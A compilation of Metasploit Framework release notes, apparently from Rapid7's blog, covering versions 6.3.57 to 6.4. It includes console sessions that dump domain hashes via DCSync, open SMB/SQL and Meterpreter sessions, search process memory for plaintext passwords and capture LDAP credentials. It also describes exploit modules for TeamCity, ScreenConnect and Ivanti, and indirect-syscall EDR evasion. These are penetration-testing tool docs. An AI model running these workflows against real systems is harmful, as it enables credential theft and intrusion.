  • The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
• We added the post/windows/manage/kerberos_tickets post module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
• The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…

[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed

DNS Configuration

One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.

Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:

msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size:    0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98


Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201

New session types

Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.

New SMB Session Type Examples

You can open a new SMB session by setting the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445   - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > 

The session will open as a new SMB session type:

msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
  Id  Name  Type  Information                        Connection
  --  ----  ----  -----------                        ----------
  1         smb   SMB vagrant @ 192.168.123.133:445  192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >

Interacting with the session allows for direct file manipulation of the remote host including upload and download support:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
    #  Type  Name                 Created                    Accessed                   Written                    Changed                    Size
    -  ----  ----                 -------                    --------                   -------                    -------                    ----
    0  DIR   .                    2023-09-15T18:56:07+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00
    1  DIR   ..                   2021-05-08T09:06:51+01:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00
    2  FILE  passwords.docx       2023-10-10T12:34:57+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  1403

The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1

Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:

msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >

Kerberos authentication is also supported:

msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true 

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

New SQL Session Types Examples

Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:

msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password

Which will create a new SQL session:

[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:

msf6 auxiliary(scanner/mssql/mssql_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                     Connection
  --  ----  ----   -----------                     ----------
  1         mssql  MSSQL test @ 192.168.2.242:143  192.168.2.1:60963 -> 192.168.23                               .242:1433 (192.168.2.242)

msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
    #  NULL
    -  ----
    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
	    Oct 8 2022 05:58:25
	    Copyright (C) 2022 Microsoft Corporation
	    Developer Edition (64-bit) on Windows Server 2022 Stand
       ard 10.0 <X64> (Build 20348: ) (Hypervisor)

The query_interactive command will start an interactive prompt for running multiple multi-line queries:

mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
    -  -------------  ------------  ----------             ----------
    0  master         dbo           spt_fallback_db        BASE TABLE
    1  master         dbo           spt_fallback_dev       BASE TABLE
    2  master         dbo           spt_fallback_usg       BASE TABLE
    4  master         dbo           Users                  BASE TABLE
    5  master         dbo           spt_monitor            BASE TABLE
    6  master         dbo           MSreplication_options  BASE TABLE
SQL >>

Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:

msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql

Indirect Syscalls Support for Windows Meterpreter

Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an “indirect syscall”. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.

Discoverability Improvements

The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.

Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Windows Meterpreter Memory Searching

Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.

This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:

msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 2972)

[*] Memory Matches for ssh.exe (pid: 2972)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Full diff 6.3.0...6.4.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.

New module content (1)

OpenNMS Horizon Authenticated RCE

Author: Erik Wynter
Type: Exploit
Pull request: #18618 contributed by ErikWynter
Path: linux/http/opennms_horizon_authenticated_rce
AttackerKB reference: CVE-2023-0872

Description: This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user. For versions 32.0.2 and higher, this module requires valid credentials for a user with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST. For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges.

Enhancements and features (5)

• #18838 from SickMcNugget - This adds support for Debian and includes a number of fixes and improvements for the runc_cwd_priv_esc module. Prior to this fix, the module would incorrectly report some of the versions that the patch had been back ported to as vulnerable.
• #18841 from randomstr1ng - This PR updates the sap_icm_paths.txt wordlist with the newest entries.
• #18885 from errorxyz - Enhances the sessions command so that both Meterpreter and the top level Metasploit prompt support sessions -i -1.
• #18978 from dwelch-r7 - This PR updates several login modules to now display some messaging to the end of scans to tell the user how many credentials and/or sessions were successful.
• #18980 from zgoldman-r7 - Improves the help command wording when interacting with basic shells.

Bugs fixed (2)

• #18947 from molecula2788 - Fixes an issue with exploits/windows/local/wmi_persistence module when Powershell obfuscation was applied.
• #18974 from zeroSteiner - Fixes a typo in the help menu of the dns command.

Documentation added (1)

• #18965 from adfoster-r7 - This PR updates our README.md to remove a stale documentation link.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.60...6.4.0
• Full diff 6.3.60...6.4.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New module content (3)

GitLab Password Reset Account Takeover

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an exploit module that leverages an account-take-over vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality as it’s possible to provide two email addresses so that
the reset code will be sent to both. It is therefore possible to provide the email
address of the target account as well as that of one we control, and to reset the password.

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

• #18835 from zgoldman-r7 - This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
• #18899 from zeroSteiner - Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
• #18930 from dwelch-r7 - This PR adds the ability to run a help command from within the interactive SQL prompt.
• #18931 from cgranleese-r7 - Adds additional help information when interacting with an SQL session.
• #18932 from adfoster-r7 - This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

• #18944 from zeroSteiner - This fixes an issue when saving and loading DNS rules from the config.
• #18945 from adfoster-r7 - Fixes an issue that caused a crash when running http crawler with database connected.
• #18949 from zeroSteiner - This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
• #18952 from cgranleese-r7 - Updates Postgres hashdump module to now work with newer versions of Postgres.
• #18954 from adfoster-r7 - This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

• #18868 from zeroSteiner - This adds documentation for the new DNS command.
• #18937 from jjoshm - Fixes a typo in the Kerberos documentation.
• #18951 from adfoster-r7 - This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.59...6.3.60
• Full diff 6.3.59...6.3.60

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New module content (2)

GitLab Tags RSS feed email disclosure

Authors: erruquill and n00bhaxor
Type: Auxiliary
Pull request: #18821 contributed by n00bhaxor
Path: gather/gitlab_tags_rss_feed_email_disclosure
AttackerKB reference: CVE-2023-5612

Description: This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-5612) in Gitlab versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 to retrieve user email addresses via tags feed.

BoidCMS Command Injection

Authors: 1337kid and bwatters-r7
Type: Exploit
Pull request: #18827 contributed by bwatters-r7
Path: multi/http/cve_2023_38836_boidcms
AttackerKB reference: CVE-2023-38836

Description: This PR adds an authenticated RCE against BoidCMS versions 2.0.0 and earlier. The underlying issue in the vulnerability CVE-2023-38836 is that the file upload check allows a php file to be uploaded and executes as a media file if the GIF header is present in the PHP file.

Enhancements and features (11)

• #18686 from h00die - This updates the existing auxiliary/scanner/ssh/ssh_version module with new checks for supported cryptographic algorithms and version detection capabilities.
• #18715 from errorxyz - This adds a Splunk library for use by future modules. It also updates the existing exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 module to use it.
• #18796 from errorxyz - This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.
• #18862 from sjanusz-r7 - This PR aligns the client's peerhost and peerport API for the recently added SQL-based sessions (postgres, mssql, mysql).
• #18875 from dwelch-r7 - This PR adds conditional validation of options depending on the chosen connection type, so for example if you want to connect via RHOST we also check (where applicable) that RPORT or the USERNAME is set. When a connection is made over an existing SESSION we can still allow the user to only set SESSION and not worry about the missing values only required for a new RHOST connection.
• #18887 from cgranleese-r7 - Updates the search command to now search modules that are compatible with a specified session type, for instance: search session_type:meterpreter or search session_type:smb.
• #18903 from sjanusz-r7 - This PR improves the UX by correctly handling databases changes by updating the prompt to now get the appropriate database value in the context of a MySQL or MSSQL session.
• #18905 from cgranleese-r7 - Improves the pwd command output for SMB sessions.
• #18908 from adfoster-r7 - Update SAMR computer and ICPR cert to support SMB sessions.
• #18921 from dwelch-r7 - This adds the IP address to the SMB session prompt when there is no selected share.
• #18926 from cgranleese-r7 - Update sessions to have a consistent set of local file system commands.

Bugs fixed (5)

• #18844 from sfewer-r7 - This fixes a bug in the file dropper mixin that would prevent files from being deleted with a Windows shell session.
• #18897 from adfoster-r7 - Updates the smb_login module to support configuring the negotiated SMB protocol versions and whether encryption is negotiated.
• #18904 from double16 - Fixes the windows/gather/bloodhound module to no longer incorrectly validate the OutputDirectory option.
• #18920 from dwelch-r7 - This PR fixes an issue with the autorunscript module option within an SMB session.
• #18928 from dwelch-r7 - This PR fixes an issue when running the auxiliary/gather/windows_secrets_dump module while using the SESSION module option to connect, that caused the client to be disconnected and unable to be reused for subsequent runs/other modules.

Documentation (1)

• #18929 from adfoster-r7 - Updates the Metasploit API documentation library to the latest available version to avoid CVE-2024-27285 - an XSS in the default YARD template. Thanks to Aviv Keller for reporting.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.58...6.3.59
• Full diff 6.3.58...6.3.59

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Connect the dots from authentication bypass to remote code execution

This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all versions of ConnectWise ScreenConnect up to and including 23.9.7.The module creates a new administrator user account on the server, which is used it to upload a malicious extension (.ashx file) and get code execution as the NT AUTHORITY\SYSTEM user on Windows or root user on Linux, depending on the target platform.

New module content (1)

ConnectWise ScreenConnect Unauthenticated Remote Code Execution

Authors: WatchTowr and sfewer-r7
Type: Exploit
Pull request: #18870 contributed by sfewer-r7
Path: multi/http/connectwise_screenconnect_rce_cve_2024_1709

Description: This PR adds an unauthenticated RCE exploit for ConnectWise ScreenConnect (CVE-2024-1709).

Enhancements and features (8)

• #18830 from sjanusz-r7 - Aligns the behavior of the MSSQL, PostgreSQL, and MySQL sessions. This functionality is currently behind a feature flag enabled with the features command.
• #18833 from zeroSteiner - This catches an exception when updating a non-existing session. Prior to this PR, trying to run 'sessions -k' after running 'workspace -D' would result in a stack trace being printed to the console. This resolves issue #18561.
• #18849 from adfoster-r7 - Adjusts the logic used for the visual indentation of tables.
• #18872 from zgoldman-r7 - Updates the MSSQL modules to support querying database rows that contain boolean bit values.
• #18878 from adfoster-r7 - This updates a number of rspec gems which help improve test suite error messages when string encodings are different.
• #18879 from zeroSteiner - Updates the auxiliary/admin/kerberos/inspect_ticket module with improved error messages and support for printing Kerberos PAC credential information.
• #18892 from zeroSteiner - Allows users to leverage the latest ADCS ESC13 technique. These changes are related to the identification of misconfigured certificate templates and workflow documentation. ldap_esc_vulnerable_cert_finder and ldap_query were also updated to improve usability.
• #18893 from sjanusz-r7 - Updates the help command to visually align command names to the same width to improve readability.

Bugs fixed (2)

• #18873 from cgranleese-r7 - Fixes a regression that caused a CreateSession option to be available for payloads that did not make sense.
• #18880 from jmartin-tech - Fixes a bug with the auxiliary/capture/ldap module's handling of NTLM hashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.57...6.3.58
• Full diff 6.3.57...6.3.58

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

LDAP Capture module

Metasploit now has an LDAP capture module thanks to the work of
JustAnda7. This work was completed as part of the Google Summer of Code program.

When the module runs it will by default require privileges to listen on port 389. The module implements a default implementation for BindRequest, SearchRequest, UnbindRequest, and will capture both plaintext credentials and NTLM hashes which can be brute-forced offline. Upon receiving a successful Bind Request, a ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

The module can be with run:

msf6 > use auxiliary/server/capture/ldap
msf6 auxiliary(server/capture/ldap) > run

Incoming requests will have their credentials stored for later use:

[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
[+] LDAP Login Attempt => From:127.0.0.1:55566	 Username:admin	 ntlm_hash::8aa0e517cd547b4032ff7e9c5359c200879aa5a8031d3d74	 Domain:DOMAIN

These values will be stored in the database for later retrieval:

msf6 auxiliary(server/capture/ldap) > creds
Credentials
===========
host       origin     service         public  private  realm        private_type  JtR Format
----       ------     -------         ------  -------  -----        ------------  ----------
10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      

Ivanti exploit module

Another honorable mention for this week’s Metasploit release is a module by sfewer-r7 that chains two recently disclosed vulnerabilities(CVE-2024-21893 and CVE-2024-21887) in Ivanti gateways to achieve remote code execution on a vulnerable target. The vulnerabilities are both being widely exploited in the wild. Read Rapid7’s full technical analysis of the exploit chain in AttackerKB.

New module content (4)

Authentication Capture: LDAP

Author: JustAnda7
Type: Auxiliary
Pull request: #18678 contributed by jmartin-tech
Path: server/capture/ldap

Description: Adds a new auxiliary/server/capture/ldap module that emulates an LDAP Server. The server accepts a user's bind request, and the user credentials or NTLM hash is then captured, logged, and persisted to the currently active database. An ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18792 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_21893
AttackerKB references: CVE-2024-21887, CVE-2023-36661, CVE-2024-21893

Description: This module exploits the recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Ivanti Policy Secure. The SSRF is chained to a command injection vulnerability (CVE-2024-21887) to achieve unauthenticated RCE.

